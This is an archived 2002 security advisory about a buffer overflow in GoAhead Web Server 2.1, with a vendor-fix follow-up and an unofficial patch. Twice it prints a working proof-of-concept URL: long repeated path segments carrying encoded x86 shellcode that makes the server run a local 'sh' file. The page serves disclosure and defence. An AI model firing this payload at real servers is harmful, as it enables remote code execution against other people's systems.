SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Web Server/CGI)  >   GoAhead Web Server Vendors:   GoAhead Software
GoAhead Web Server Buffer Overflow Lets Remote Users Execute Arbitrary Code on the System
SecurityTracker Alert ID:  1005052
SecurityTracker URL:  http://securitytracker.com/id/1005052
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 14 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.1
Description:   A buffer overflow vulnerability was reported in the GoAhead Web Server. A remote user can execute arbitrary code on the system.

A remote user can create a specially crafted URL to trigger the overflow and cause arbitrary code to be executed.

A demonstration exploit for ix86 Linux machines is provided. In this demonstration, the web server will execute the 'sh' file in the working directory of the web server:

http://10.0.0.3/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/
x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/%eb%1f%5e%89%76%08%31%c0%88%46%
07%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%db%89%d8%40%cd%80%e8
%dc%ff%ff%ffreboot

Impact:   A remote user can execute arbitrary code on the server with the privileges of the web server.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided an unofficial patch, available in the Source Message.

Vendor URL:  www.goahead.com/webserver/webserver.htm (Links to External Site)
Cause:   Boundary error
Underlying OS:   Linux (Any), Windows (CE), Windows (NT), Windows (95), Windows (98)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Issues Fix) Re: GoAhead Web Server Buffer Overflow Lets Remote Users Execute Arbitrary Code on the System   ("Tom Bajoras" <tbajoras@artlogic.com>)
The vendor has released a fix.



 Source Message Contents

Date:  Wed, 14 Aug 2002 11:13:49 -0400
Subject:  [NEWS] GoAhead Buffer Overflows (Multiple Slashes, Exploit)


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -



  GoAhead Buffer Overflows (Multiple Slashes, Exploit)
------------------------------------------------------------------------


SUMMARY

The  <http://www.goahead.com/webserver/wsover.htm> GoAhead WebServer is an 
open standard Web server compliant with all necessary standards to be an 
effective embedded Web server. A security vulnerability in the product 
allows remote attackers to cause an overflow in the program, causing it to 
execute arbitrary code.

DETAILS

Vulnerable systems:
 * GoAhead Web Server version 2.1

Exploit:
A proof of concept exploit of this severe problem is attached herein. This 
exploit works on an ix86 Linux machine and will cause the web server to 
execute the 'sh' file in the working directory of the web server. Note 
that it is quite trivial to adapt the exploit to execute any chosen 
executable file on the system. To test the exploit simply point a browser 
to the GoAhead web server and issue a request to the URL supplied in the 
attached file exploit.txt.

http://10.0.0.3/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/
x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/%eb%1f%5e%89%76%08%31%c0%88%46%
07%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%db%89%d8%40%cd%80%e8
%dc%ff%ff%ffreboot

Unofficial fix:
diff -u ws212-020612/default.c ws212-020612gby/default.c
--- ws212-020612/default.c  Wed Jun 12 19:38:48 2002
+++ ws212-020612gby/default.c  Wed Jun 19 16:34:24 2002
@@ -204,9 +204,11 @@
  *  is bad.
  */
 
+#define MAXDIRPATH (64)
+
 int websValidateUrl(webs_t wp, char_t *path)
 {
-  char_t  *parts[64];          /* Array of ptr's to URL parts */
+  char_t  *parts[MAXDIRPATH];          /* Array of ptr's to URL parts */
   char_t  *token, *dir, *lpath;
   int    i, len, npart;
 
@@ -241,7 +243,11 @@
     } else if (gstrcmp(token, T(".")) != 0) {
       parts[npart] = token;
       len += gstrlen(token) + 1;
-      npart++;
+      if(++npart >= MAXDIRPATH) {
+      /* Damn script kitties... */
+        bfree(B_L, path);
+        return -1;
+      } 
     }
     token = gstrtok(NULL, T("/"));
   }

Vendor response:
GoAhead, makers of the GoAhead web server and Art &Logic, their support 
partner were both contacted on three different occasions during the last 
three months but supplied no meaningful response.


ADDITIONAL INFORMATION

The information has been provided by Anonymous.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages. 






 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC